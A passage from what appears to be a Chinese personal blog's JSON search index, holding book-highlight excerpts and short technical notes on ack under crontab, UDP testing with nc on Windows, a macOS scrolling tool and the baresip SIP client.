maximal):发生的故障会永久性的损害产品的声誉,并导致用户不再使用它。标注(黄色) - 3.2.2 风险 \u0026gt; 位置 2267风险不大可能彻底消除。驾驶有风险,但我们仍然会开车出行;旅游有风险,但我们并没有停止旅游。标注(黄色) - 3.2.2 风险 \u0026gt; 位置 2285在软件开发中,任何一种可以在 10分钟之内完成的事情都是微不足道的,或是本来就不值得做的。标注(黄色) - 3.2.2 风险 \u0026gt; 位置 2323风险分析是一个独立的领域,在许多其他行业里被严肃地对待。我们现在采用的是一个轻量级的版本,标注(黄色) - 3.2.2 风险 \u0026gt; 位置 2325风险管理方法),这可以作为进一步学习这一重要课题的起点。标注(黄色) - 3.2.2 风险 \u0026gt; 位置 2328TE有责任理解所有的风险点,并使用他或她可以利用的任何手段予以缓解。标注(黄色) - 3.2.5 TE的招聘 \u0026gt; 位置 2668他们只是在试图破坏软件,还是同时在验证它能正常工作?标注(黄色) - 3.2.5 TE的招聘 \u0026gt; 位置 2717我们需要的是愿意持续学习和成长的人。我们也需要那些带来新鲜思想和经验的人,标注(黄色) - 3.3 与Google Docs测试工程师林赛·韦伯斯特(Lindsay Webster)的访谈 \u0026gt; 位置 
3301对于一个新项目,我首先要站在用户的角度了解这个产品。有可能的话,我会作为一个用户,以自己的账户和个人数据去使用产品。我努力使自己经历完整的用户体验。一旦有自己的真实数据在里面,你对一个产品的期待会彻底改变。在具备了用户心态之后,我会做下面的一些事情。标注(黄色) - 3.3 与Google Docs测试工程师林赛·韦伯斯特(Lindsay Webster)的访谈 \u0026gt; 位置 3362遗漏到客户的 bug是一项重要指标,我希望这个数字接近 0。标注(黄色) - 3.3 与Google Docs测试工程师林赛·韦伯斯特(Lindsay Webster)的访谈 \u0026gt; 位置 3377或者用户场景无需编写、自动到位。 CRUD操作(译注: create、 read、 update、 delete)标注(黄色) - 3.3 与Google Docs测试工程师林赛·韦伯斯特(Lindsay Webster)的访谈 \u0026gt; 位置 3385团队在推出一个产品或新功能时难免感到提心吊胆,而我能带给他们镇定和信心,这使我感到自己是一种正面、有益的力量。标注(黄色) - 3.4 与YouTube测试工程师安普·周(Apple Chow)的访谈 \u0026gt; 位置 3416而 Google的 SET必须写代码,这是他们的工作。这里也很难找到不会写代码的 TE。标注(黄色) - 3.4 与YouTube测试工程师安普·周(Apple Chow)的访谈 \u0026gt; 位置 3426Google的测试与其他公司的相同之处呢? Apple:在测试上难以自动化的软件,很难成为好的软件。标注(黄色) - 3.4 与YouTube测试工程师安普·周(Apple Chow)的访谈 \u0026gt; 位置 3493不管是测试框架还是测试用例都以简单为要,随着项目的开展再迭代的设计。不要试图事先解决所有问题。要敢于扔掉过时的东西。第4章 测试工程经理标注(黄色) - 4.8 搜索和地理信息测试总监Shelton Mar的访谈 \u0026gt; 位置 3989把测试推向上游,让整个团队(开发 +测试)为交付的质量负责。标注(黄色) - 4.8 搜索和地理信息测试总监Shelton Mar的访谈 \u0026gt; 位置 4025从那以后,我们把配置变更也纳入质量流程中,我们开发了一套自动化测试,每次数据和配置变更时都要执行。标注(黄色) - 4.11 工程经理Brad Green访谈 \u0026gt; 位置 4219Google聘用的都是有极端自我驱动力的家伙。“标注(黄色) - 4.12 James Whittaker访谈 \u0026gt; 位置 4339先虚心学习,再在一线作出成绩,然后开始寻求创新的方法。第5章 Google软件测试改进标注(黄色) - 位置 4398Google的测试流程可以非常简练地概括为:标注(黄色) - 位置 4398让每个工程师都注重质量。标注(黄色) - 位置 4398只要大家诚实认真地这么做,质量就会提高。代码质量从一开始就能更好,标注(黄色) - 5.1 Google流程中的致命缺陷 \u0026gt; 位置 4408可是测试并不能保证质量。质量是内建的,而不是外加的。因此,保证质量是开发者的任务,标注(黄色) - 5.1 Google流程中的致命缺陷 \u0026gt; 位置 4409测试成了开发的拐杖。我们越不让开发考虑测试的问题,把测试变得越简单,开发就越来越不会去做测试。标注(黄色) - 5.1 Google流程中的致命缺陷 \u0026gt; 位置 4415保证质量不但是别人的问题,它甚至还属于另一个部门。标注(黄色) - 5.1 Google流程中的致命缺陷 \u0026gt; 位置 4416出问题的时候也很容易就把责任推卸给修前草坪的外包公司。标注(黄色) - 5.1 Google流程中的致命缺陷 \u0026gt; 位置 4426第三个致命的缺陷,是测试人员往往崇拜测试产物( test artifact)胜过软件本身。标注(黄色) - 5.1 Google流程中的致命缺陷 \u0026gt; 位置 4430所有测试产物的价值,在于它们对代码的影响,进而通过产品来体现。标注(黄色) - 5.2 SET的未来 \u0026gt; 位置 4447简单来说,我们认为 SET没有未来。 SET就是开发。就这么简单。标注(黄色) - 5.2 SET的未来 \u0026gt; 位置 
4450SET直接负责很多功能特性,如可测试性、可靠性、可调试性,\n","permalink":"https://wdd.js.org/posts/2021/07/yh8ulq/","summary":"Google软件测试之道(异步图书)James Whittaker; Jason Arbon; Jeff Carollo\n序标注(黄色) - 位置 361从根本上说,如果测试人员想加入这个俱乐部,就必须具备良好的计算机科学基础和编程能力。变革标注(黄色) - 位置 367招聘具备开发能力的测试人员很难,找到懂测试的开发人员就更难,标注(黄色) - 位置 368但是维持现状更要命,我只能往前走。标注(黄色) - 位置 388我们寻找的人要兼具开发人员的技能和测试人员的思维,他们必须会编程,能实现工具、平台和测试自动化。第1章 Google软件测试介绍标注(黄色) - 1.1 质量不等于测试 \u0026gt; 位置 573Google能用如此少的专职测试人员的原因,就是开发对质量的负责。标注(黄色) - 1.1 质量不等于测试 \u0026gt; 位置 574如果某个产品出了问题,第一个跳出来的肯定是导致这个问题发生的开发人员,而不是遗漏这个 bug的测试人员。标注(黄色) - 1.2.1 软件开发工程师(SWE) \u0026gt; 位置 593软件开发工程师(标注(黄色) - 1.2.2 软件测试开发工程师(SET) \u0026gt; 位置 600软件测试开发工程师(标注(黄色) - 1.2.3 测试工程师(TE) \u0026gt; 位置 612TE把用户放在第一位来思考。 TE组织整体质量实践,分析解释测试运行结果,第2章 软件测试开发工程师书签 - 位置 784标注(黄色) - 位置 787Google的 SWE是功能开发人员; Google的 SET是测试开发人员; Google的 TE是用户开发人员。标注(黄色) - 2.1.1 开发和测试流程 \u0026gt; 位置 864测试驱动开发”标注(黄色) - 2.","title":"Google软件测试之道(异步图书) James Whittaker; Jason Arbon; Jeff Carollo"},{"content":"沉默的病人(世界狂销300万册的烧脑神作!多少看似完美的夫妻,都在等待杀死对方的契机)亚历克斯·麦克利兹\n第二部分 PAPT TWO标注(黄色) - 9 \u0026gt; 位置 1294选择自己所爱的人就像选择心理治疗师,”鲁思说,“我们有必要问自己,这个人会不会对我忠诚,能不能听得进批评,标注(黄色) - 9 \u0026gt; 位置 1295承认所犯的错误,而且做不到的事情决不承诺?”第三部分 PAPT THREE标注(黄色) - 位置 2577虽然我生来不是个好人,有时我却偶然要做个好人。——威廉·莎士比亚《冬天的故事》[\n","permalink":"https://wdd.js.org/posts/2021/07/rgx3g5/","summary":"沉默的病人(世界狂销300万册的烧脑神作!多少看似完美的夫妻,都在等待杀死对方的契机)亚历克斯·麦克利兹\n第二部分 PAPT TWO标注(黄色) - 9 \u0026gt; 位置 1294选择自己所爱的人就像选择心理治疗师,”鲁思说,“我们有必要问自己,这个人会不会对我忠诚,能不能听得进批评,标注(黄色) - 9 \u0026gt; 位置 1295承认所犯的错误,而且做不到的事情决不承诺?”第三部分 PAPT THREE标注(黄色) - 位置 2577虽然我生来不是个好人,有时我却偶然要做个好人。——威廉·莎士比亚《冬天的故事》[","title":"沉默的病人(世界狂销300万册的烧脑神作!多少看似完美的夫妻,都在等待杀死对方的契机)"},{"content":"手工执行,可以获得预期结果,但是在crontab中,却查不到结果。\nstage_count=$(ack -h \u0026#34;\\- name:\u0026#34; -t yaml | wc -l) 最终使用--nofilter参数,解决了问题。\nstage_count=$(ack --nofilter -h \u0026#34;\\- name:\u0026#34; -t yaml | wc -l) 参考\nhttps://stackoverflow.com/questions/55777520/ack-fails-in-cronjob-but-runs-fine-from-commandline 
","permalink":"https://wdd.js.org/shell/contab-ack/","summary":"手工执行,可以获得预期结果,但是在crontab中,却查不到结果。\nstage_count=$(ack -h \u0026#34;\\- name:\u0026#34; -t yaml | wc -l) 最终使用--nofilter参数,解决了问题。\nstage_count=$(ack --nofilter -h \u0026#34;\\- name:\u0026#34; -t yaml | wc -l) 参考\nhttps://stackoverflow.com/questions/55777520/ack-fails-in-cronjob-but-runs-fine-from-commandline ","title":"Ack 在contab中无法查到关键词"},{"content":"引言标注(黄色) - 位置 225人并不是住在客观的世界,而是住在自己营造的主观世界里。第一夜 我们的不幸是谁的错?标注(黄色) - 不为人知的心理学“第三巨头” \u0026gt; 位置 335但在世界上,阿德勒是与弗洛伊德、荣格并列的三大巨头之一。标注(黄色) - 再怎么“找原因”,也没法改变一个人 \u0026gt; 位置 377如果所有人的“现在”都由“过去”所决定,那岂不是很奇怪吗?标注(黄色) - 再怎么“找原因”,也没法改变一个人 \u0026gt; 位置 384您是说与过去没有关系?哲人:是的,这就是阿德勒心理学的立场。标注(黄色) - 再怎么“找原因”,也没法改变一个人 \u0026gt; 位置 389阿德勒心理学考虑的不是过去的“原因”,而是现在的“目的”。标注(黄色) - 心理创伤并不存在 \u0026gt; 位置 417任何经历本身并不是成功或者失败的原因。我们并非因为自身经历中的刺激——所谓的心理创伤——而痛苦,事实上我们会从经历中发现符合自己目的的因素。决定我们自身的不是过去的经历,而是我们自己赋予经历的意义。”标注(黄色) - 心理创伤并不存在 \u0026gt; 位置 423人生不是由别人赋予的,而是由自己选择的,是自己选择自己如何生活。标注(黄色) - 心理创伤并不存在 \u0026gt; 位置 443我们大家都是在为了某种“目的”而活着。这就是目的论。标注(黄色) - 你的不幸,皆是自己“选择”的 \u0026gt; 位置 599而是因为你认为“不幸”对你自身而言是一种“善”。标注(黄色) - 人们常常下定决心“不改变” \u0026gt; 位置 614某人如何看“世界”,又如何看“自己”,把这些“赋予意义的方式”汇集起来的概念就可以理解为生活方式。标注(黄色) - 你的人生取决于“当下” \u0026gt; 位置 706无论之前的人生发生过什么,都对今后的人生如何度过没有影响。”决定自己人生的是活在“此时此刻”的你自己。第二夜 一切烦恼都来自人际关系标注(黄色) - 为什么讨厌自己? 
\u0026gt; 位置 780阿德勒心理学把这叫作“鼓励”。青年:鼓励?书签 - 一切烦恼都是人际关系的烦恼 \u0026gt; 位置 834标注(黄色) - 自卑情结只是一种借口 \u0026gt; 位置 936自卑情结是指把自己的自卑感当作某种借口使用的状态。标注(黄色) - 自卑情结只是一种借口 \u0026gt; 位置 943外部因果律”一词来进行说明。意思就是:将原本没有任何因果关系的事情解释成似乎有重大因果关系一样。标注(黄色) - 人生不是与他人的比赛 \u0026gt; 位置 1044健全的自卑感不是来自与别人的比较,而是来自与“理想的自己”的比较。标注(黄色) - 在意你长相的,只有你自己 \u0026gt; 位置 1071在意你长相的,只有你自己标注(黄色) - 人生的三大课题:交友课题、工作课题以及爱的课题 \u0026gt; 位置 1223交友课题、工作课题以及爱的课题标注(黄色) - 人生的三大课题:交友课题、工作课题以及爱的课题 \u0026gt; 位置 1224一切烦恼皆源于人际关系”标注(黄色) - 浪漫的红线和坚固的锁链 \u0026gt; 位置 1313当人能够感觉到“与这个人在一起可以无拘无束”的时候,才能够体会到爱。既没有自卑感也不必炫耀优越性,能够保持一种平静而自然的状态。真正的爱应该是这样的。标注(黄色) - 浪漫的红线和坚固的锁链 \u0026gt; 位置 1315束缚是想要支配对方的表现,也是一种基于不信任感的想法。与一个不信任自己的人处在同一个空间里,那就根本不可能保持一种自然状态。标注(黄色) - “人生谎言”教我们学会逃避 \u0026gt; 位置 1333那并不是因为无法容忍 A的缺点才讨厌他,而是你先有“要讨厌 A”这个目的,之后才找出了符合这个目的的缺点。标注(黄色) - “人生谎言”教我们学会逃避 \u0026gt; 位置 1345人就是这么任性而自私的生物,一旦产生这种想法,无论怎样都能发现对方的缺点。标注(黄色) - 阿德勒心理学是“勇气的心理学” \u0026gt; 位置 1373青年:也就是“不在于被给予了什么,而在于如何去使用被给予的东西”那句话吗?第三夜 让干涉你生活的人见鬼去标注(黄色) - 自由就是不再寻求认可? \u0026gt; 位置 1405就是:“货币是被铸造的自由。”它是陀思妥耶夫斯基的小说中出现的一句话。“被铸造的自由”这种说法是何等的痛快啊!我认为这是一句非常精辟的话,它一语道破了货币的标注(黄色) - 自由就是不再寻求认可? \u0026gt; 位置 1449阿德勒心理学否定寻求他人的认可。标注(黄色) - 要不要活在别人的期待中? \u0026gt; 位置 1479在犹太教教义中有这么一句话:“倘若自己都不为自己活出自己的人生,那还有谁会为自己而活呢?”你就活在自己的人生中。书签 - 要不要活在别人的期待中? 
\u0026gt; 位置 1498标注(黄色) - 砍断“格尔迪奥斯绳结” \u0026gt; 位置 1689否定原因论、否定精神创伤、采取目的论;认为人的烦恼全都是关于人际关系的烦恼;此外,不寻求认可或者课题分离也全都是反常识的理论。标注(黄色) - 自由就是被别人讨厌 \u0026gt; 位置 1764自由就是被别人讨厌”。标注(黄色) - 自由就是被别人讨厌 \u0026gt; 位置 1785不畏惧被人讨厌而是勇往直前,不随波逐流而是激流勇进,这才是对人而言的自由。第五夜 认真的人生“活在当下”标注(黄色) - 对决“人生最大的谎言” \u0026gt; 位置 2910人生中最大的谎言就是不活在“此时此刻”。纠结过去、关注未来,把微弱而模糊的光打向人生整体,自认为看到了些什么。标注(黄色) - 对决“人生最大的谎言” \u0026gt; 位置 2916因为过去和未来根本不存在,所以才要谈现在。起决定作用的既不是昨天也不是明天,而是“此时此刻”。标注(黄色) - 人生的意义,由你自己决定 \u0026gt; 位置 2982必须有人开始。即使别人不合作,那也与你无关。我的意见就是这样。应该由你开始,不用去考虑别人是否合作。”后记标注(黄色) - 位置 3011一切烦恼皆源于人际关系”“人可以随时改变并能够获得幸福”“问题不在于能力而在于勇气\n","permalink":"https://wdd.js.org/posts/2021/06/ineayu/","summary":"引言标注(黄色) - 位置 225人并不是住在客观的世界,而是住在自己营造的主观世界里。第一夜 我们的不幸是谁的错?标注(黄色) - 不为人知的心理学“第三巨头” \u0026gt; 位置 335但在世界上,阿德勒是与弗洛伊德、荣格并列的三大巨头之一。标注(黄色) - 再怎么“找原因”,也没法改变一个人 \u0026gt; 位置 377如果所有人的“现在”都由“过去”所决定,那岂不是很奇怪吗?标注(黄色) - 再怎么“找原因”,也没法改变一个人 \u0026gt; 位置 384您是说与过去没有关系?哲人:是的,这就是阿德勒心理学的立场。标注(黄色) - 再怎么“找原因”,也没法改变一个人 \u0026gt; 位置 389阿德勒心理学考虑的不是过去的“原因”,而是现在的“目的”。标注(黄色) - 心理创伤并不存在 \u0026gt; 位置 417任何经历本身并不是成功或者失败的原因。我们并非因为自身经历中的刺激——所谓的心理创伤——而痛苦,事实上我们会从经历中发现符合自己目的的因素。决定我们自身的不是过去的经历,而是我们自己赋予经历的意义。”标注(黄色) - 心理创伤并不存在 \u0026gt; 位置 423人生不是由别人赋予的,而是由自己选择的,是自己选择自己如何生活。标注(黄色) - 心理创伤并不存在 \u0026gt; 位置 443我们大家都是在为了某种“目的”而活着。这就是目的论。标注(黄色) - 你的不幸,皆是自己“选择”的 \u0026gt; 位置 599而是因为你认为“不幸”对你自身而言是一种“善”。标注(黄色) - 人们常常下定决心“不改变” \u0026gt; 位置 614某人如何看“世界”,又如何看“自己”,把这些“赋予意义的方式”汇集起来的概念就可以理解为生活方式。标注(黄色) - 你的人生取决于“当下” \u0026gt; 位置 706无论之前的人生发生过什么,都对今后的人生如何度过没有影响。”决定自己人生的是活在“此时此刻”的你自己。第二夜 一切烦恼都来自人际关系标注(黄色) - 为什么讨厌自己? 
\u0026gt; 位置 780阿德勒心理学把这叫作“鼓励”。青年:鼓励?书签 - 一切烦恼都是人际关系的烦恼 \u0026gt; 位置 834标注(黄色) - 自卑情结只是一种借口 \u0026gt; 位置 936自卑情结是指把自己的自卑感当作某种借口使用的状态。标注(黄色) - 自卑情结只是一种借口 \u0026gt; 位置 943外部因果律”一词来进行说明。意思就是:将原本没有任何因果关系的事情解释成似乎有重大因果关系一样。标注(黄色) - 人生不是与他人的比赛 \u0026gt; 位置 1044健全的自卑感不是来自与别人的比较,而是来自与“理想的自己”的比较。标注(黄色) - 在意你长相的,只有你自己 \u0026gt; 位置 1071在意你长相的,只有你自己标注(黄色) - 人生的三大课题:交友课题、工作课题以及爱的课题 \u0026gt; 位置 1223交友课题、工作课题以及爱的课题标注(黄色) - 人生的三大课题:交友课题、工作课题以及爱的课题 \u0026gt; 位置 1224一切烦恼皆源于人际关系”标注(黄色) - 浪漫的红线和坚固的锁链 \u0026gt; 位置 1313当人能够感觉到“与这个人在一起可以无拘无束”的时候,才能够体会到爱。既没有自卑感也不必炫耀优越性,能够保持一种平静而自然的状态。真正的爱应该是这样的。标注(黄色) - 浪漫的红线和坚固的锁链 \u0026gt; 位置 1315束缚是想要支配对方的表现,也是一种基于不信任感的想法。与一个不信任自己的人处在同一个空间里,那就根本不可能保持一种自然状态。标注(黄色) - “人生谎言”教我们学会逃避 \u0026gt; 位置 1333那并不是因为无法容忍 A的缺点才讨厌他,而是你先有“要讨厌 A”这个目的,之后才找出了符合这个目的的缺点。标注(黄色) - “人生谎言”教我们学会逃避 \u0026gt; 位置 1345人就是这么任性而自私的生物,一旦产生这种想法,无论怎样都能发现对方的缺点。标注(黄色) - 阿德勒心理学是“勇气的心理学” \u0026gt; 位置 1373青年:也就是“不在于被给予了什么,而在于如何去使用被给予的东西”那句话吗?第三夜 让干涉你生活的人见鬼去标注(黄色) - 自由就是不再寻求认可? \u0026gt; 位置 1405就是:“货币是被铸造的自由。”它是陀思妥耶夫斯基的小说中出现的一句话。“被铸造的自由”这种说法是何等的痛快啊!我认为这是一句非常精辟的话,它一语道破了货币的标注(黄色) - 自由就是不再寻求认可? \u0026gt; 位置 1449阿德勒心理学否定寻求他人的认可。标注(黄色) - 要不要活在别人的期待中? \u0026gt; 位置 1479在犹太教教义中有这么一句话:“倘若自己都不为自己活出自己的人生,那还有谁会为自己而活呢?”你就活在自己的人生中。书签 - 要不要活在别人的期待中? 
\u0026gt; 位置 1498标注(黄色) - 砍断“格尔迪奥斯绳结” \u0026gt; 位置 1689否定原因论、否定精神创伤、采取目的论;认为人的烦恼全都是关于人际关系的烦恼;此外,不寻求认可或者课题分离也全都是反常识的理论。标注(黄色) - 自由就是被别人讨厌 \u0026gt; 位置 1764自由就是被别人讨厌”。标注(黄色) - 自由就是被别人讨厌 \u0026gt; 位置 1785不畏惧被人讨厌而是勇往直前,不随波逐流而是激流勇进,这才是对人而言的自由。第五夜 认真的人生“活在当下”标注(黄色) - 对决“人生最大的谎言” \u0026gt; 位置 2910人生中最大的谎言就是不活在“此时此刻”。纠结过去、关注未来,把微弱而模糊的光打向人生整体,自认为看到了些什么。标注(黄色) - 对决“人生最大的谎言” \u0026gt; 位置 2916因为过去和未来根本不存在,所以才要谈现在。起决定作用的既不是昨天也不是明天,而是“此时此刻”。标注(黄色) - 人生的意义,由你自己决定 \u0026gt; 位置 2982必须有人开始。即使别人不合作,那也与你无关。我的意见就是这样。应该由你开始,不用去考虑别人是否合作。”后记标注(黄色) - 位置 3011一切烦恼皆源于人际关系”“人可以随时改变并能够获得幸福”“问题不在于能力而在于勇气","title":"被讨厌的勇气:“自我启发之父”阿德勒的哲学课"},{"content":"有时候,客户端的udp包被中间的防火墙拦截了,在linux上可以很简单的用nc启动一个udp server\n# 启动udp server 监听20000端口 nc -ulp 20000 # 启动udp client nc -u 127.0.0.1 20000 在linux上启动nc udp server很简单,但是在windows上,没办法安装nc啊?😭\n峰回路转 https://nmap.org/download.html 在查看了nc的官网之后,发现nc实际上也提供了windows的程序,有两种版本。\n有GUI界面的,使用友好,安装包比较大 https://nmap.org/dist/nmap-7.91-setup.exe 仅仅在命令行下执行,刚好满足需求 https://nmap.org/dist/nmap-7.91-win32.zip 看看带GUI界面的\n附件 nmap-7.91-win32.zip ","permalink":"https://wdd.js.org/posts/2021/06/ex5n9h/","summary":"有时候,客户端的udp包被中间的防火墙拦截了,在linux上可以很简单的用nc启动一个udp server\n# 启动udp server 监听20000端口 nc -ulp 20000 # 启动udp client nc -u 127.0.0.1 20000 在linux上启动nc udp server很简单,但是在windows上,没办法安装nc啊?😭\n峰回路转 https://nmap.org/download.html 在查看了nc的官网之后,发现nc实际上也提供了windows的程序,有两种版本。\n有GUI界面的,使用友好,安装包比较大 https://nmap.org/dist/nmap-7.91-setup.exe 仅仅在命令行下执行,刚好满足需求 https://nmap.org/dist/nmap-7.91-win32.zip 看看带GUI界面的\n附件 nmap-7.91-win32.zip ","title":"windows版本nc教程:在windows上做udp测试"},{"content":"现象 有时候轻微滚动滚轮,页面不滚动,然后突然又发生了滚动 解决方案 Mos https://github.com/Caldis/Mos 一个用于在MacOS上平滑你的鼠标滚动效果的小工具, 让你的滚轮爽如触控板。 特性 疯狂平滑你的鼠标滚动效果 支持分离触控板/鼠标事件, 单独翻转鼠标滚动方向。 滚动曲线的自定义调整。 支持区分应用处理, 黑/白名单系统。 用于监控滚动事件的图形化呈现窗口。 基于 Swift4 构建 免费 附件 Mos.Versions.3.3.2.dmg ","permalink":"https://wdd.js.org/posts/2021/06/ismran/","summary":"现象 有时候轻微滚动滚轮,页面不滚动,然后突然又发生了滚动 解决方案 Mos https://github.com/Caldis/Mos 一个用于在MacOS上平滑你的鼠标滚动效果的小工具, 让你的滚轮爽如触控板。 特性 
疯狂平滑你的鼠标滚动效果 支持分离触控板/鼠标事件, 单独翻转鼠标滚动方向。 滚动曲线的自定义调整。 支持区分应用处理, 黑/白名单系统。 用于监控滚动事件的图形化呈现窗口。 基于 Swift4 构建 免费 附件 Mos.Versions.3.3.2.dmg ","title":"macos 鼠标滚轮不灵敏"},{"content":"安装 安装前要先安装依赖\nhttps://github.com/baresip/re https://github.com/baresip/rem openssl git clone https://github.com/baresip/baresip cd baresip make sudo make install 指令 /about About box/accept Accept incoming call/answermode Set answer mode/apistate User Agent state/auloop Start audio-loop /auloop_stop Stop audio-loop/auplay Switch audio player/ausrc Switch audio source/callstat Call status/conf_reload Reload config file/config Print configuration/contact_next Set next contact/contact_prev Set previous contact/contacts List contacts/dial .. Dial/dialcontact Dial current contact/hangup Hangup call/help Help menu/insmod Load module/listcalls List active calls/loglevel Log level toggle/main Main loop debug/memstat Memory status/message Message current contact/modules Module debug/netstat Network debug/options Options/play Play audio file/quit Quit/reginfo Registration info/rmmod Unload module/sipstat SIP debug/sysinfo System info/timers Timer debug/uadel Delete User-Agent/uafind Find User-Agent /uanew Create User-Agent/uanext Toggle UAs/uastat UA debug/uuid Print UUID/vidloop Start video-loop /vidloop stop Stop video-loop/vidsrc Switch video source\n模块 aac Advanced Audio Coding (AAC) audio codecaccount Account loaderalsa ALSA audio driveramr Adaptive Multi-Rate (AMR) audio codecaptx Audio Processing Technology codec (aptX)aubridge Audio bridge moduleaudiounit AudioUnit audio driver for MacOSX/iOSaufile Audio module for using a WAV-file as audio inputauloop Audio-loop test moduleausine Audio sine wave input moduleav1 AV1 video codecavcapture Video source using iOS AVFoundation video captureavcodec Video codec using FFmpeg/libav libavcodecavformat Video source using FFmpeg/libav libavformatb2bua Back-to-Back User-Agent (B2BUA) modulecodec2 Codec2 low bit rate speech codeccons UDP/TCP console UI drivercontact 
Contacts modulecoreaudio Apple macOS Coreaudio driverctrl_tcp TCP control interface using JSON payloaddebug_cmd Debug commandsdirectfb DirectFB video display moduledshow Windows DirectShow video sourcedtls_srtp DTLS-SRTP end-to-end encryptionebuacip EBU ACIP (Audio Contribution over IP) Profileecho Echo server moduleevdev Linux input driverfakevideo Fake video input/output driverg711 G.711 audio codecg722 G.722 audio codecg7221 G.722.1 audio codecg726 G.726 audio codecgsm GSM audio codecgst Gstreamer audio sourcegst_video Gstreamer video codecgtk GTK+ 2.0 UIgzrtp ZRTP module using GNU ZRTP C++ libraryhttpd HTTP webserver UI-modulei2s I2S (Inter-IC Sound) audio driverice ICE protocol for NAT Traversaljack JACK Audio Connection Kit audio-driverl16 L16 audio codecmenu Interactive menumpa MPA Speech and Audio Codecmulticast Multicast RTP send and receivemqtt MQTT (Message Queue Telemetry Transport) modulemwi Message Waiting Indicationnatpmp NAT Port Mapping Protocol (NAT-PMP) moduleomx OpenMAX IL video display moduleopensles OpenSLES audio driveropus OPUS Interactive audio codecpcp Port Control Protocol (PCP) moduleplc Packet Loss Concealment (PLC) using spandspportaudio Portaudio driverpulse Pulseaudio driverpresence Presence modulertcpsummary RTCP summary modulerst Radio streamer using mpg123sdl Simple DirectMedia Layer 2.0 (SDL) video output driverselfview Video selfview modulesnapshot Save video-stream as PNG imagessndfile Audio dumper using libsndfilesndio Audio driver for OpenBSDspeex_pp Audio pre-processor using libspeexdspsrtp Secure RTP encryption (SDES) using libre SRTP-stackstdio Standard input/output UI driverstun Session Traversal Utilities for NAT (STUN) moduleswscale Video scaling using libswscalesyslog Syslog moduleturn Obtaining Relay Addresses from STUN (TURN) moduleuuid UUID generator and loaderv4l2 Video4Linux2 video sourcev4l2_codec Video4Linux2 video codec module (H264 hardware encoding)vidbridge Video bridge modulevidinfo Video info overlay 
modulevidloop Video-loop test modulevp8 VP8 video codecvp9 VP9 video codecvumeter Display audio levels in consolewebrtc_aec Acoustic Echo Cancellation (AEC) using WebRTC SDKwincons Console input driver for Windowswinwave Audio driver for Windowsx11 X11 video output driverx11grab X11 grabber video sourcezrtp ZRTP media encryption module\n参考 https://github.com/baresip/baresip ","permalink":"https://wdd.js.org/opensips/tools/baresip/","summary":"安装 安装前要先安装依赖\nhttps://github.com/baresip/re https://github.com/baresip/rem openssl git clone https://github.com/baresip/baresip cd baresip make sudo make install 指令 /about About box/accept Accept incoming call/answermode Set answer mode/apistate User Agent state/auloop Start audio-loop /auloop_stop Stop audio-loop/auplay Switch audio player/ausrc Switch audio source/callstat Call status/conf_reload Reload config file/config Print configuration/contact_next Set next contact/contact_prev Set previous contact/contacts List contacts/dial .. Dial/dialcontact Dial current contact/hangup Hangup call/help Help menu/insmod Load module/listcalls List active calls/loglevel Log level toggle/main Main loop debug/memstat Memory status/message Message current contact/modules Module debug/netstat Network debug/options Options/play Play audio file/quit Quit/reginfo Registration info/rmmod Unload module/sipstat SIP debug/sysinfo System info/timers Timer debug/uadel Delete User-Agent/uafind Find User-Agent /uanew Create User-Agent/uanext Toggle UAs/uastat UA debug/uuid Print UUID/vidloop Start video-loop /vidloop stop Stop video-loop/vidsrc Switch video source","title":"baresip 非常好用的终端SIP UA"},{"content":"第一讲 关关雎鸠在河洲 ——先秦神话和诗歌标注(黄色) - 位置 129女娲炼石补天处,石破天惊逗秋雨”,第二讲 百家争鸣写春秋 ——先秦散文标注(黄色) - 位置 306为川者决之使导,为民者宣之使言。”标注(黄色) - 位置 466他就发愤努力,一定要做仓库里的老鼠。第三讲 大风起兮云飞扬 ——汉朝的赋和散文标注(黄色) - 位置 538有两个情况可以免死:一是拿出大量的金钱赎身;第二就是受宫刑。标注(黄色) - 位置 539叫《报任安书》:标注(黄色) - 位置 557事情。《史记》写完之后,司马迁就不知所终了。第六讲 独念天地之悠悠 ——隋与初唐文学标注(黄色) - 位置 1346王勃,他在初唐时代是一个非常有才华的少年,他 
27岁就死了。真是“千古文章未尽才”。他写《滕王阁序》,标注(黄色) - 位置 1359就是把你的遭遇拉到跟他相同的地步。譬如说,你考试得了 65分,不高兴,我就对你说:不要难过嘛,我不过只考 67分而已,咱们俩都差不多。第七讲 登高壮观天地间 ——盛唐诗歌标注(黄色) - 位置 1406秦时明月汉时关,万里长征人未还。但使龙城飞将在,不教胡马度阴山。——王昌龄《出塞二首》(其一)标注(黄色) - 位置 1664桃花潭水深千尺,不及汪伦送我情。第八讲 乌衣巷口夕阳斜 ——中唐诗歌标注(黄色) - 位置 1809座中泣下谁最多,江州司马青衫湿。”标注(黄色) - 位置 1892十年磨一剑,霜刃未曾试。第九讲 霜叶红于二月花 ——晚唐诗歌标注(黄色) - 位置 1906停车坐爱枫林晚,霜叶红于二月花。第十讲 大江东去浪淘沙 ——两宋金元文学书签 - 位置 2168标注(黄色) - 位置 2509山盟虽在,锦书难托。标注(黄色) - 位置 2559劝君更尽一杯酒,西出阳关无故人”,标注(黄色) - 位置 2560桃花潭水深千尺,不及汪伦送我情”,\n","permalink":"https://wdd.js.org/posts/2021/06/rml5uy/","summary":"第一讲 关关雎鸠在河洲 ——先秦神话和诗歌标注(黄色) - 位置 129女娲炼石补天处,石破天惊逗秋雨”,第二讲 百家争鸣写春秋 ——先秦散文标注(黄色) - 位置 306为川者决之使导,为民者宣之使言。”标注(黄色) - 位置 466他就发愤努力,一定要做仓库里的老鼠。第三讲 大风起兮云飞扬 ——汉朝的赋和散文标注(黄色) - 位置 538有两个情况可以免死:一是拿出大量的金钱赎身;第二就是受宫刑。标注(黄色) - 位置 539叫《报任安书》:标注(黄色) - 位置 557事情。《史记》写完之后,司马迁就不知所终了。第六讲 独念天地之悠悠 ——隋与初唐文学标注(黄色) - 位置 1346王勃,他在初唐时代是一个非常有才华的少年,他 27岁就死了。真是“千古文章未尽才”。他写《滕王阁序》,标注(黄色) - 位置 1359就是把你的遭遇拉到跟他相同的地步。譬如说,你考试得了 65分,不高兴,我就对你说:不要难过嘛,我不过只考 67分而已,咱们俩都差不多。第七讲 登高壮观天地间 ——盛唐诗歌标注(黄色) - 位置 1406秦时明月汉时关,万里长征人未还。但使龙城飞将在,不教胡马度阴山。——王昌龄《出塞二首》(其一)标注(黄色) - 位置 1664桃花潭水深千尺,不及汪伦送我情。第八讲 乌衣巷口夕阳斜 ——中唐诗歌标注(黄色) - 位置 1809座中泣下谁最多,江州司马青衫湿。”标注(黄色) - 位置 1892十年磨一剑,霜刃未曾试。第九讲 霜叶红于二月花 ——晚唐诗歌标注(黄色) - 位置 